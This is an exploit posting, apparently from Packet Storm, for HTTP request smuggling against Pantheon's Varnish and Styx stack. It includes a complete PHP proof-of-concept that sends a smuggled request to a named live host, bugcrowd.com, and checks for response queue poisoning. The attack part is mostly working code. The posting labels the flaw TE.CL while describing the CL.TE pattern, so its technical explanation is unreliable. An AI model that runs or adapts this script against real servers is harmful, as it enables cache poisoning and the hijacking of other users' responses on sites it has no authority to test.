Share
## https://sploitus.com/exploit?id=PACKETSTORM:213290
=============================================================================================================================================
    | # Title     : HTTP Request Smuggling (TE.CL) via Edge Cache Misconfiguration (Varnish โ†” Styx)                                             |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |
    | # Vendor    : https://pantheon.io/                                                                                                        |
    =============================================================================================================================================
    
    [+] References :  
    
    [+] Summary    : A critical HTTP Request Smuggling (TE.CL) vulnerability exists due to inconsistent HTTP request parsing 
                     between the Pantheon edge caching layer (Varnish) and the backend routing layer (Styx / Nginx).
                     The edge layer accepts ambiguous requests containing both Content-Length and Transfer-Encoding, 
    				 while the backend correctly prioritizes Transfer-Encoding: chunked.
                     This discrepancy allows an attacker to smuggle arbitrary HTTP requests, resulting in response queue poisoning and potential web cache poisoning.
    
    [+] Technical Details :
    
    Frontend (Varnish Edge Cache)
    
    Parses requests using Content-Length
    
    Does not reject dual-header ambiguity (CL + TE)
    
    Backend (Pantheon Styx / Nginx)
    
    [+] Prioritizes Transfer-Encoding: chunked
    
    Leaves smuggled payload queued for the next request
    
    [+] Vulnerability Class :
    
    Desynchronization โ†’ Response Queue Poisoning โ†’ Cache Poisoning
    
    [+] Proof of Concept (PoC)
    
    The following PoC demonstrates request smuggling by injecting a benign smuggled request and observing its response being returned for a subsequent legitimate request.
    
    [+] PoC : poc_final.php
    
    <?php
    /**
     * Proof of Concept: HTTP Request Smuggling (TE.CL)
     * Target: Pantheon-hosted application
     */
    
    error_reporting(E_ALL);
    $host = "www.bugcrowd.com"; // Pantheon-hosted example
    $asset = "/etc/designs/bugcrowd/clientlibs/main.js";
    $poc_mark = "PANTHEON_TECL_POC_" . rand(100, 999);
    
    $fp = fsockopen("ssl://$host", 443, $errno, $errstr, 15);
    if (!$fp) die("[-] Connection Failed: $errstr");
    
    // Smuggled request
    $smuggled = "GET /nonexistent-$poc_mark HTTP/1.1\r\n";
    $smuggled .= "Host: $host\r\n";
    $smuggled .= "Connection: keep-alive\r\n\r\n";
    
    // Main TE.CL request
    $body = "0\r\n\r\n" . $smuggled;
    $request = "POST / HTTP/1.1\r\n";
    $request .= "Host: $host\r\n";
    $request .= "Transfer-Encoding: chunked\r\n";
    $request .= "Content-Length: 4\r\n";
    $request .= "Connection: keep-alive\r\n\r\n";
    $request .= $body;
    
    fwrite($fp, $request);
    usleep(600000);
    
    // Trigger request
    fwrite($fp, "GET $asset HTTP/1.1\r\nHost: $host\r\n\r\n");
    
    $response = "";
    while (!feof($fp)) {
        $response .= fgets($fp, 1024);
    }
    fclose($fp);
    
    if (strpos($response, $poc_mark) !== false) {
        echo "[+] SUCCESS: Response queue poisoned via TE.CL.\n";
    }
    ?>
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================